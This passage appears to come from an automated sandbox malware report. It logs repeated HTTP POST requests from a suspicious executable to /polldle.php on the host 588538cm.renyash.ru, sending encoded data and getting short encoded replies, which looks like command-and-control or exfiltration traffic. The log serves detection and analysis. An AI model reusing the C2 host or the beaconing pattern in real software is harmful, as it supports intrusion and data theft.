45 | 192.168.2.4 | 49958 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 23:33:32.292885065 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.4 | 49964 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 23:33:32.620986938 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 1620
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
Jan 11, 2025 23:33:32.973712921 CET | 1620 | OUT | Data Raw: 58 5e 51 52 5f 46 5a 51 54 5d 55 5a 50 5e 59 5c 50 52 5a 5f 57 5c 50 58 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X^QR_FZQT]UZP^Y\PRZ_W\PX[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU .C2$Y&2*',2#%^-++(?W231. 6"#+%#X'/\/,
Jan 11, 2025 23:33:33.092134953 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 23:33:33.329216957 CET | 951 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:33 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KlgGNoPhR4bCV%2FjNBspxLuAI00XPYAWOt4yQUaZ5It9Z6kpqILAlugotrxZU3EjhtQAUHW2m93q2vmkFL3y0kp%2BzH6fdQLdWeDE2IaxzP8TVD5I0M59ILYbtCwchzt2YEhFBcgfP"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e7d89671839-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4492&min_rtt=1614&rtt_var=6361&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1939&delivery_rate=59255&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 38 0d 0a 0e 11 2d 0d 27 34 0a 5d 3d 39 2b 59 2e 28 3f 5b 2d 21 0e 5a 3e 22 32 5f 20 17 2b 02 25 0b 28 57 3e 2a 2d 40 3c 3a 24 0c 37 00 25 0c 26 13 23 46 0c 1d 22 10 3d 11 2f 0a 25 5a 27 03 29 30 32 13 31 1c 23 19 29 27 3f 13 2a 2a 32 01 22 3c 3d 0d 2b 22 3a 0f 2a 1b 0c 17 2c 1f 20 00 32 10 2e 51 0f 16 22 0d 21 08 2f 04 22 2e 3f 15 32 1e 3b 12 29 27 3c 10 32 04 0e 14 28 23 0c 5f 2b 0c 3f 08 33 2e 34 09 31 06 3e 5c 3c 3a 2c 0a 3c 01 24 5c 23 0f 28 56 05 3f 5b 4d 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 98-'4]=9+Y.(?[-!Z>"2_ +%(W>*-@<:$7%&#F"=/%Z')021#)'?**2"<=+":*, 2.Q"!/".?2;)'<2(#_+?3.41>\<:,<$\#(V?[M0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                47 | 192.168.2.4 | 49965 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:32.750979900 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:33.098568916 CET | 2504 | OUT | Data Raw: 5d 5e 54 51 5a 48 5a 59 54 5d 55 5a 50 5f 59 5c 50 55 5a 58 57 52 50 56 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]^TQZHZYT]UZP_Y\PUZXWRPV[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU .3@%(?&3Y&",68+Z??<206,7$]"/<#X'/\/(
                                                                                Jan 11, 2025 23:33:33.223433018 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:33.465531111 CET | 811 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:33 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A8zHVSqo8GnmzNSFGjlhUO3VFPNcqvCFm60eEVX24uai1qVC5%2FvuepEl0CLYN9Ka1deBpgPiuPaeFrTurOUN%2F5Ws4NR%2B3YAAHK41YiDMQYKXA836tQ%2Bj2xFDAOq0vBOC%2BDFfVL4%2F"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e7e5d50b9c5-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=8080&min_rtt=2011&rtt_var=12893&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=28871&cwnd=140&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                48 | 192.168.2.4 | 49971 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:33.586257935 CET | 295 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:33:33.942331076 CET | 2504 | OUT | Data Raw: 58 5e 54 52 5a 48 5f 5a 54 5d 55 5a 50 5d 59 5f 50 53 5a 53 57 55 50 59 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X^TRZH_ZT]UZP]Y_PSZSWUPY[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#A.35%(8Y%=X3.#5/];X)/(%36.0"!?]+5#X'/\/
                                                                                Jan 11, 2025 23:33:34.158008099 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:34.270266056 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:34.288883924 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:34 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=smLAh0HOhWmASQX%2FXgXdXENIEnnJd0rlWqM%2Fh40R1k%2FDJYduymjSxaXowSEScpXZTLeAHrpAEbMqglvG6UUJVfJYDzTV%2FMivNhoGHbkN18WDZ9rfNRc03zy1iH5Y5I9FWHVdgqcQ"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e83885f6a52-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3502&min_rtt=1711&rtt_var=4223&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=91028&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                49 | 192.168.2.4 | 49977 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:34.829845905 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:35.176700115 CET | 2504 | OUT | Data Raw: 5d 5a 54 56 5f 43 5f 5a 54 5d 55 5a 50 55 59 5c 50 52 5a 5e 57 52 50 5a 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]ZTV_C_ZT]UZPUY\PRZ^WRPZ[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#B:U&%]116$Y9S4Z>,8+Z(&T.[#2#Y<#X'/\/
                                                                                Jan 11, 2025 23:33:35.274679899 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:35.444473982 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:35 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b8qu%2Fo0BaNuS1Kd6BsIvAXN9bjUI6VaGY84Dv5MAHHx6YTp8px7ZnzW8NANiQUgyP4OwV5d%2BAgjJot4drCeLLJ96qqndkSuVwxnDobOC%2BpO%2BfLMNcnRNSEksCpKiOkZrp9QUMKYu"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e8b39fb1a24-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4822&min_rtt=1984&rtt_var=6421&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=59123&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                50 | 192.168.2.4 | 49983 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:35.575347900 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:35.926717997 CET | 2504 | OUT | Data Raw: 58 51 51 50 5a 49 5a 5a 54 5d 55 5a 50 5b 59 50 50 53 5a 5b 57 53 50 5d 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XQQPZIZZT]UZP[YPPSZ[WSP][\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#F:%18$Z%T5$4!Z/+;[<?,1#,$;5+<#X'/\/
                                                                                Jan 11, 2025 23:33:36.039613008 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:36.275959969 CET | 815 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:36 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g2p4cnEkRIcn2GhfEjn3V%2FaNqc%2B%2Bpfg%2FgLhaJb0EpTLbmVbQ7qLjdNkYWygKUiEBphub60AjPRtu0%2FJhqAqP7VwNYO%2FCP6YHtEKXaVtQBe08TpNs1DtX%2FUAiXBFrVI%2Bbba4tJ4V8"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e8ffec8c436-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2963&min_rtt=1489&rtt_var=3507&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=109890&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                51 | 192.168.2.4 | 49989 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:36.398030996 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:36.754849911 CET | 2504 | OUT | Data Raw: 58 58 54 53 5f 44 5f 58 54 5d 55 5a 50 5a 59 5d 50 52 5a 5f 57 52 50 59 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XXTS_D_XT]UZPZY]PRZ_WRPY[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#,3"1;<\21*06"/*/;(/1#:S-'+5[(#X'/\/<
                                                                                Jan 11, 2025 23:33:36.870580912 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:37.106985092 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:37 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0GQ3sHHE2BQCZTKkZ49AypXNcMIafMlPf%2Fjs9Io1W2RZdMFKKlmjLLgynstIzYjrE6pnhLiQbO%2FuB8WwJXFy4gusEB1%2B0NnTIK3RdV6ANt2qEx0Hx0n5jG11PcQ11QZLda4WaGFV"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e952a2a8c57-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3298&min_rtt=1958&rtt_var=3414&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=115151&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                52 | 192.168.2.4 | 49995 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:37.371926069 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2500
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:37.723629951 CET | 2500 | OUT | Data Raw: 5d 59 54 54 5a 40 5f 5b 54 5d 55 5a 50 5c 59 5e 50 56 5a 52 57 53 50 5d 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]YTTZ@_[T]UZP\Y^PVZRWSP][\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#A.3.1;29Y$?%R _-(4+?3202.B _5+<#X'/\/<
                                                                                Jan 11, 2025 23:33:37.834806919 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:38.067089081 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:38 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UKpkRs6uoS0lYfJCRAPygQ%2FormAgfjNs0XQADr4IpufIGkbq7v12VYdvLKiaj9xmPixhc47Vgkkhv95cKvOqHa38NCC7%2BMwAmW1S%2FYs9pPD9vTwEi8XcBD%2FxTdfl39pj5dnwu%2F85"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e9b2fa8de94-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3292&min_rtt=1606&rtt_var=3974&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2819&delivery_rate=96720&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                53 | 192.168.2.4 | 50001 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:38.206327915 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                54 | 192.168.2.4 | 50002 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:38.340356112 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 1596
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:38.692361116 CET | 1596 | OUT | Data Raw: 58 50 54 54 5f 44 5f 58 54 5d 55 5a 50 5d 59 50 50 53 5a 5c 57 54 50 5b 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XPTT_D_XT]UZP]YPPSZ\WTP[[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#C951(/$"*%/- 2,;[), 1,$$[6,+#X'/\/
                                                                                Jan 11, 2025 23:33:38.800487041 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:38.957979918 CET | 963 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:38 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=beohgQAMfkYr9mbce1XeQKeSB6I7HFq%2BD%2BISqQj4%2BiMu%2Fbjb6X0aiXBMBKv7SkWh%2BvJlhqTwBv%2BgHyzx4zj8dOrSZuNpfngxqcWjDuD%2BH3jr%2Fgt5dd27W8Ivj4wqCbIIdS00r3J2"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085ea139e332f4-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3886&min_rtt=1913&rtt_var=4665&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1915&delivery_rate=82467&cwnd=111&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 38 0d 0a 0e 11 2e 53 27 1d 2f 02 3e 07 2f 5e 39 28 09 5b 2c 31 28 13 3e 08 26 5f 37 39 28 5c 25 22 24 53 28 5c 31 06 3c 5c 28 0e 20 00 0f 0c 25 03 23 46 0c 1d 21 00 3d 3f 24 53 27 2f 34 5d 29 23 0c 13 25 0c 28 43 3d 1a 37 1c 3d 2a 3a 07 36 02 04 18 2b 31 29 57 2a 1b 22 17 2c 31 3c 01 31 2a 2e 51 0f 16 21 57 23 21 38 14 23 2e 20 05 24 23 24 02 3f 27 2c 5c 31 2a 28 50 3f 23 21 01 3c 31 30 1d 30 5b 3f 56 27 2f 03 05 3e 39 05 51 3c 01 24 5c 23 0f 28 56 05 3f 5b 4d 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 98.S'/>/^9([,1(>&_79(\%"$S(\1<\( %#F!=?$S'/4])#%(C=7=*:6+1)W*",1<1*.Q!W#!8#. $#$?',\1*(P?#!<100[?V'/>9Q<$\#(V?[M0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                55 | 192.168.2.4 | 50004 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:38.464637995 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2500
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
